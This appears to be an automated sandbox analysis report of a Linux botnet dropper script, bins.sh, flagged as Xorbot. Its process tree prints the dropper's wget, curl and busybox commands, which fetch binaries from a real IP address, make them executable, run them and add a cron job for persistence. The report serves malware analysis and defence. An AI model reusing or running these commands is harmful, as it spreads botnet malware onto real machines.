Analysis
-
max time kernel
149s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27/02/2025, 16:23
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
e4ab9be0cf5c27c72b420fc606e0700a
-
SHA1
d3549211a3fdbd5e1fb153d2f7c711000b0339db
-
SHA256
0bfa0c9ecd60657c9dee4a927bf6fb575c6593ec3756e9425642452749a3a40c
-
SHA512
3e2b6dd99e8a0e4abc2a4a35a786de1d02d2b0fda5baa7390d53c70e31c978e62189d010741cc32d5bc5d613083cec1374501335a179f6fe533ff7170be7536b
-
SSDEEP
96:fHncM5hGDpc21Y8abkXx2tKbkE2h2tdRPWAxHnc6phGvpthLVY8xd:V5aG2+rQxG/CC
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1966) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 770 chmod 688 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH 689 bins.sh /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd 771 bins.sh -
Renames itself 1 IoCs
pid Process 772 PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.BlAyKX crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/17/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/854/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/924/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/964/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/980/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/995/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1091/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/817/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/828/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/845/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/878/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/26/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/806/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/955/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/970/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/989/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/20/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/818/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/830/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1002/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1041/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1051/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1100/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/822/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/926/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1073/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/808/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/874/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/912/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/920/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/999/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1004/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1023/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1049/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/15/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/789/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/802/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/865/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/885/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/954/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1060/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1070/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/859/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/962/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1027/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/823/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/850/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/961/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1006/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1018/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1025/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1082/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/206/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/923/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/997/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1020/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/815/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/10/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/19/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/104/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/self/auxv curl File opened for reading /proc/968/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1088/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd File opened for reading /proc/1098/cmdline PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH busybox File opened for modification /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd wget File opened for modification /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd curl File opened for modification /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd busybox File opened for modification /tmp/Pms3WTDY7UrDojH8BdAAd4auYwS3NfuF2G wget File opened for modification /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH wget File opened for modification /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:654 -
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:677
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- Writes file to tmp directory
PID:687
-
-
/bin/chmodchmod 777 PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH./PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵PID:689
-
-
/bin/rmrm PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH2⤵PID:691
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- Writes file to tmp directory
PID:692
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- Writes file to tmp directory
PID:769
-
-
/bin/chmodchmod 777 PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd./PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵
- Renames itself
- Reads runtime system information
PID:771 -
/bin/shsh -c "crontab -l"3⤵PID:773
-
/usr/bin/crontabcrontab -l4⤵PID:774
-
-
-
/bin/shsh -c "crontab -"3⤵PID:775
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:776
-
-
-
-
/bin/rmrm PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd2⤵PID:778
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/Pms3WTDY7UrDojH8BdAAd4auYwS3NfuF2G2⤵
- Writes file to tmp directory
PID:781
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
12KB
MD552ada75fd996718b8b9bc34da16eef24
SHA1d12ad65f90bf69998210811cbb938a7265da1481
SHA2560d8fb1bdefaaecec5c364cd7de9fee4b858437104269904655f5525b3396a6ff
SHA5126090176f681c151bb983e1dc4f5aa754e0dcf4d0d082e97a981055acec881c6a6da09062db0fe7bc95346b1b1ccd09813fadf51b06e0744e7c062f6c5f8f1361
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
210B
MD570337ad935aa43cd14d49d17d2e97c95
SHA14bd37b55154c602f76a193ca431a5b822616930d
SHA2569bb073a53d9f11e97cb19bf2fc65f6a47cbbf9d054624c9cf10b0958f08427fc
SHA5120c67c323a19ee3eb33c39bc085f02b3cad48ffc3d8466508f62c66dbddff882cb1a4f13b4f27226f5066756dcd5b8b696bcfec86a5ce71fbb176dbcf678b3b7e